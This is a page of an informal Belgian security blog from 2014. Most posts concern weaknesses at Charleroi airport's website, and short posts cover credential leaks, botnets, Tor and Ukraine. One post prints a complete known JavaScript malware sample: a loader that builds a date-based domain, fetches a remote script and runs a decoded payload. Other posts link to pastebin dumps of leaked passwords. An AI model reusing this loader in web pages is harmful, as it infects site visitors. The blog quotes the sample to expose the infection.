08/30/2014

so charleroi-airport if there is a complaint, your site is in .... France

yep, here will all the problems begin for the police and the justice department to do their work and to stay in the Belgian context

belgian critical infrastructure has its website in France ......

smart ?

Permalink |  Print |  Facebook | | | | Pin it! |

website of charleroi airport is hosted on server with infected sites

this is the googledork  site:aznetwork.eu/

does this mean that charleroi airport doesn't have the money to host its own website on a real dedicated server maybe this is one of the causes of the problems and makes low hanging fruit or a backdoor into your own infrastructure

and this is one alert known to Google

 

and this is what virustotal says, of which only three sites are blocking this address

source http://quttera.com/detailed_report/hit2012.aznetwork.eu

and here is even more information from

http://sitecheck.sucuri.net/results/hit2012.aznetwork.eu

this is the script that is here the problem

Known javascript malware. Details: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v19
<meta http-equiv="refresh" content="0;url=./accueil/index.html"></head><body><script>function hashda
te (str) {if(!str) {var date=new Date();var str = date.getUTCFullYear() + "/" + (date.getUTCMonth()+1) + "/" + date.getUTCDate() + " " + (date.getHours() >= 12 ? 'PM':'AM');};var table = [0,1996959894,3993919788,2567524794,124634137,1886057615,3915621685,2657392035,249268274,2044508324,3772115230,2547177864,162941995,2125561021,3887607047,2428444049,498536548,1789927666,4089016648,2227061214,450548861,1843258603,4107580753,2211677639,325883990,1684777152,4251122042,2321926636,335633487,1661365465,4195302755,2366115317,997073096,1281953886,3579855332,2724688242,1006888145,1258607687,3524101629,2768942443,901097722,1119000684,3686517206,2898065728,853044451,1172266101,3705015759,2882616665,651767980,1373503546,3369554304,3218104598,565507253,1454621731,3485111705,3099436303,671266974,1594198024,3322730930,2970347812,795835527,1483230225,3244367275,3060149565,1994146192,31158534,2563907772,4023717930,1907459465,112637215,2680153253,3904427059,2013776290,251722036,2517215374,3775830040,2137656763,141376813,2439277719,3865271297,1802195444,476864866,2238001368,4066508878,1812370925,453092731,2181625025,4111451223,1706088902,314042704,2344532202,4240017532,1658658271,366619977,2362670323,4224994405,1303535960,984961486,2747007092,3569037538,1256170817,1037604311,2765210733,3554079995,1131014506,879679996,2909243462,3663771856,1141124467,855842277,2852801631,3708648649,1342533948,654459306,3188396048,3373015174,1466479909,544179635,3110523913,3462522015,1591671054,702138776,2966460450,3352799412,1504918807,783551873,3082640443,3233442989,3988292384,2596254646,62317068,1957810842,3939845945,2647816111,81470997,1943803523,3814918930,2489596804,225274430,2053790376,3826175755,2466906013,167816743,2097651377,4027552580,2265490386,503444072,1762050814,4150417245,2154129355,426522225,1852507879,4275313526,2312317920,282753626,1742555852,4189708143,2394877945,397917763,1622183637,3604390888,2714866558,953729732,1340076626,3518719985,2797360999,1068828381,1219638859,3624741850,2936675148,906185462,1090812512,3747672003,2825379669,829329135,1181335161,3412177804,3160834842,628085408,1382605366,3423369109,3138078467,570562233,1426400815,3317316542,2998733608,733239954,1555261956,3268935591,3050360625,752459403,1541320221,2607071920,3965973030,1969922972,40735498,2617837225,3943577151,1913087877,83908371,2512341634,3803740692,2075208622,213261112,2463272603,3855990285,2094854071,198958881,2262029012,4057260610,1759359992,534414190,2176718541,4139329115,1873836001,414664567,2282248934,4279200368,1711684554,285281116,2405801727,4167216745,1634467795,376229701,2685067896,3608007406,1308918612,956543938,2808555105,3495958263,1231636301,1047427035,2932959818,3654703836,1088359270,936918000,2847714899,3736837829,1202900863,817233897,3183342108,3401237130,1404277552,615818150,3134207493,3453421203,1423857449,601450431,3009837614,3294710456,1567103746,711928724,3020668471,3272380065,1510334235,755167117];var crc = crc ^ (-1);for(var i=0, iTop=str.length; i<iTop; i++) {crc = ( crc >>> 8 ) ^ table[( crc ^ str.charCodeAt( i ) ) & 0xFF];}return (crc ^ (-1)) >>> 0;};function dbc(s) {var e={},i,k,v=[],r='',w=String.fromCharCode;var n=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(z in n){for(i=n[z][0];i<n[z][1];i++){v.push(w(i));}}for(i=0;i<64;i++){e[v[i]]=i;}for(i=0;i<s.length;i+=72){var b=0,c,x,l=0,o=s.substring(i,i+72);for(x=0;x<o.length;x++){c=e[o.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){r+=w((b>>>(l-=8))%256);}}}return r;};function runonload(){if(!document.body){setTimeout(runonload, 50);}else {var s=document.createElement("SCRIPT");s.src="http://" + hashdate().toString(16) + ".eu/script.html?"+Math.random();document.body.appendChild(s); }};window.cback=function(p){var s = document.createElement("SCRIPT");s.text = dbc(p).replace(/+/,'');document.body.appendChild(s);};runonload(); </script>

Permalink |  Print |  Facebook | | | | Pin it! |

charleroi airport website here is the adminpage of the website

now we didn't do anything

just took a screenshot

easy to find on the cloud

Permalink |  Print |  Facebook | | | | Pin it! |

charleroi airport still has a problem with the configuration of its certificate (ssl)

remember the heartbleed vulnerability that was discovered ?

problem 1

so we will check that one, but just thinking the phpmyadmin so openly published ?

and the cerficate would have been good if one would have followed the standards and paid a bit more than 100 euro's

and if you go to phpadmin page itself, you get the following warning from Firefox

 

Permalink |  Print |  Facebook | | | | Pin it! |

isn't it time that charleroi airport upgrades its website

these are the versions of PHP that you should use today if you have a strategic website

this is the configuration of their website today

Permalink |  Print |  Facebook | | | | Pin it! |

Belgium is still only the 46th infected country on the world

according to http://cybermap.kaspersky.com/

without the CERT we were the 4th most infected and so not to be trusted small country in the world

since that the CERT is there we have gone immediately to the 40th place and better only because they resolve several thousand cases each year and in a small country that makes quickly a difference

Permalink |  Print |  Facebook | | | | Pin it! |

2000 french and belgian emailaddresses and passwords leaked

source http://pastebin.com/dJ8BZS9T

Permalink |  Print |  Facebook | | | | Pin it! |

hacked and leaked GEPL - Groupement Equestre de la Province de Liege

source http://pastebin.com/zEGcKPPS

Permalink |  Print |  Facebook | | | | Pin it! |

Anonymous hacked drones from NASA and downloaded video

they are more made to be easy to guide and transmit information than to secure it

http://cyberwarzone.com/anonsec-hackers-claim-hacked-nasa-drones/

Permalink |  Print |  Facebook | | | | Pin it! |

one map to show how western the internet is

from sodanhq.com

Permalink |  Print |  Facebook | | | | Pin it! |

the most affordable 3D printer for consumers a breakthrough

source www.newmatter.com

Permalink |  Print |  Facebook | | | | Pin it! |

an interesting collection of things you can make yourself with 3D printers

source http://www.thingiverse.com/

http://www.businessinsider.com/things-you-can-make-with-a...

Permalink |  Print |  Facebook | | | | Pin it! |

#ukraine the week old invastion by Russia and its advancement in one GIF

Ukraine Map GIF (1)

Permalink |  Print |  Facebook | | | | Pin it! |

#ukraine translated : how russian soldiers are forced to take a fighting holiday in Ukraine

source http://tvrain.ru/articles/rodstvenniki_rasskazali_o_skoroj...

 
Vilhovik himself serving in the Ryazan region, 137 Guards Airborne Regiment. At the end of July 2014, he was transferred to the military unit near the village of Gukovo Rostov region, next to which is the appropriate option on the Russian-Ukrainian border

According to the relatives of a soldier, the other day he called them and said that he and his colleagues are forced to sign contracts. Parents banned Vilhovik do it, and he agreed, assuring that does not want to sign anything, as to serve him just two months - on November 7, soldiers would have to go home.

However, in the evening of the same day he called his older sister and said that he had signed a contract, without explaining why he was so quickly changed his mind. The next day, the soldiers got on the phone with a friend who spoke in detail about how forced to sign contracts. According to the soldier, he and his colleagues were threatened and vandalized tickets.

"The captain said the following sentence: I have you now on contract, and if you do not sign, I'll sign myself," - said the second soldier sister Nina Vilhovik. The same phrase repeated their relatives and other conscripts.

Later the family Vilhovika appealed to the Committee of Soldiers' Mothers and consulted a lawyer, who advised them to make a list of complaints and forward them to the legal authorities, and after receiving complaints call the soldier and tell him that he and his colleagues were going to write a report on the termination of the contract.
"
 
based on those contracts Putin says that it are not his troops because they have left a country and he has a paper to proof it to anyone who wants to be fooled by it
 

 

Permalink |  Print |  Facebook | | | | Pin it! |

#ukraine Putin has become doctor Strangelove becoming unpredictable

http://www.veoh.com/watch/v19483133d9a7jQka?h1=Dr.+Strang...

this is just a picture click the link and download the player

 

Permalink |  Print |  Facebook | | | | Pin it! |

airport charleroi under botnetattack

this is what De Standaard is writing today based on several sources

interesting to read that even in a critical infrastructure like an airport it is possible that there in infected infrastructure connected or in it or that infected infrastructure can be inserted in your infrastructure

we are talking about an airport in which there are 4 million users

and there was a heartbleed problem on the form in which people could personalise their services and that was mentioned in may while the alert was going out in april, which means that it was one month active

did they ask the users to change their password because nobody wants to say that there was a problem

and that is probably the reason why this problem has come to the attention

internally nobody wanted to know, the direction said that they weren't informed that there was a problem

they maybe didn't even know that you need a full comprehensive ITsecurity policy or that you need some level or urgency and that it is something that needs always ever more resources

 

Permalink |  Print |  Facebook | | | | Pin it! |

#cleanuptor these guys say that they have info about fixed matches (FIFA)

well it can all be a scam

but what if it is true

Permalink |  Print |  Facebook | | | | Pin it! |

#cleanuptor this is the biggest chatlist for pedophiles on TOR

well it can be a honeypot

and even if not it can be that there are a lot of coppers between them or not

but even than it is time for TOR to clean up its act and to bring such sites down

and for each you will find his particulars and his preferrences in a pop up

one is even more strange or disgusting than the other

 

Permalink |  Print |  Facebook | | | | Pin it! |

yahoo is incapable of filtering phishing against its own domain

strange because there are enough things that you could use to check

Permalink |  Print |  Facebook | | | | Pin it! |

botnet Palevo has two Belgian command and control servers .be that aren't blackholed yet

some thought that this botnet wasn't active anymore on the Belgian network but it seems as active as ever and has infected an imported number of computers

they aren't active for the moment but that doesn't mean that DNS.be has blackholed them and blocked them so that they can't be used again

and even this domain is not the trademark of this firm, opendns.com is a critical part of the internet and one shouldn't sell those names locally without being sure that you sold it to the real owners

even if you said that the botnetactivity was stopped in 2011 even if it was one of the most intense collectors

the active list of control and command centers is here https://palevotracker.abuse.ch/blocklists.php?download=combinedblocklist

http://about-threats.trendmicro.com/Malware.aspx?language=au&name=PALEVO

Permalink |  Print |  Facebook | | | | Pin it! |

1 2 3 4 5 6 7 8 Next